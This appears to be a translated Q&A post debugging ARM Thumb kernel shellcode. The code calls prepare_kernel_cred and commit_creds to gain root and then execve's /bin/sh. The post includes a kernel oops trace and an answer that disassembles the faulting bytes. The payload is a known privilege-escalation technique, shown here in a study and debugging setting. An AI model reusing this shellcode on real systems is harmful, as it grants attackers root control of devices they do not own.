我的汇编代码是
00000000 <_start>:
0: e28f6001 add r6, pc, #1
4: e12fff16 bx r6
8: 1b24 subs r4, r4, r4
a: 1c20 adds r0, r4, #0
c: 4a01 ldr r2, [pc, #4] ; (14 <_start+0x14>)
e: 4790 blx r2
10: 4a01 ldr r2, [pc, #4] ; (18 <_start+0x18>)
12: 4790 blx r2
14: 80047dbc .word 0x8003f924 ; prepare_kernel_cred
18: 80047a0c .word 0x8003f56c ; commit_creds
执行此汇编代码时,会发生段错误,错误消息为
1010201d : 4a
1010201e : 90
1010201f : 47
10102020 : 1
10102021 : 4a
10102022 : 90
10102023 : 47
10102024 : 24
10102025 : f9
10102026 : 3
10102027 : 80
10102028 : 6c
10102029 : f5
1010202a : 3
1010202b : 80
Unable to handle kernel NULL pointer dereference at virtual address 00000000
pgd = 82d44000
[00000000] *pgd=63b28831, *pte=00000000, *ppte=00000000
Internal error: Oops: 17 [#16] SMP ARM
Modules linked in: m(PO)
CPU: 0 PID: 660 Comm: test Tainted: P D W O 3.11.4 #13
task: 86834b40 ti: 8686c000 task.ti: 8686c000
PC is at 0x10102024
LR is at commit_creds+0x78/0x210
pc : [<10102024>] lr : [<8003f5e4>] psr: 20000033
sp : 8686dfa8 ip : 00000000 fp : 00000000
r10: 00000000 r9 : 8686c000 r8 : 8000e348
r7 : 00000000 r6 : 10102019 r5 : 0000001c r4 : 00000000
r3 : 00000001 r2 : 00000000 r1 : 00000001 r0 : 00000000
Flags: nzCv IRQs on FIQs on Mode SVC_32 ISA Thumb Segment user
Control: 10c53c7d Table: 62d4406a DAC: 00000015
Process test (pid: 660, stack limit = 0x8686c238)
Stack: (0x8686dfa8 to 0x8686e000)
dfa0: 00000000 0000001c 00000001 00000000 0000001c ffffffff
dfc0: 00000000 0000001c 00000000 00000000 00000000 00000000 76fb0000 00000000
dfe0: 7ec0dd00 7ec0dcf0 00008643 76f3b8f0 20000010 00000001 00000000 00000000
[<8003f5e4>] (commit_creds+0x78/0x210) from [<0000001c>] (0x1c)
Code: 4a01 4790 4a01 4790 (f924) 8003
---[ end trace 1b1bf4ebadf07b63 ]---
Segmentation fault
我认为PC is 0x10102024表示14: 8003f924 .word 0x80047dbc,因为0x1010204处的机器代码是\ x24 \ xf9 \ x03 \ 80。
但是,我不明白Unable to handle kernel NULL pointer dereference at virtual address 00000000的意思。
PC是0x10102024,但内核空指针取消引用是为什么发生?
00000000 <_start>:
0: e28f6001 add r6, pc, #1
4: e12fff16 bx r6
8: 1b24 subs r4, r4, r4
a: 1c20 adds r0, r4, #0
c: 4a0a ldr r2, [pc, #40] ; (38 <shellcode+0x22>)
e: 4790 blx r2
10: 4a0a ldr r2, [pc, #40] ; (3c <shellcode+0x26>)
12: 4790 blx r2
14: e7ff b.n 16 <shellcode>
00000016 <shellcode>:
16: 0000 movs r0, r0
18: e28f6001 add r6, pc, #1
1c: e12fff16 bx r6
20: 4678 mov r0, pc
22: 300a adds r0, #10
24: 9001 str r0, [sp, #4]
26: a901 add r1, sp, #4
28: 1a92 subs r2, r2, r2
2a: 270b movs r7, #11
2c: df01 svc 1
2e: 2f2f .short 0x2f2f
30: 2f6e6962 .word 0x2f6e6962
34: 00006873 .word 0x00006873
38: 80047dbc .word 0x80047dbc
3c: 80047a0c .word 0x80047a0c
答案 0 :(得分:2)
在你设法超出正常程序流程并开始执行随机垃圾内存的情况下,了解处理器认为正在发生的事情总是有用的 - 如果最后blx返回,那么你最终执行数据。那是什么样的?好吧,'拆解'任意原始二进制文件很有趣:
$ echo '24 f9 03 80' | xxd -r -p - hexfile
$ arm-linux-gnueabihf-objdump -bbinary -marm -D -Mforce-thumb hexfile
hexfile: file format binary
Disassembly of section .data:
00000000 <.data>:
0: f924 8003 vld4.8 {d8-d11}, [r4], r3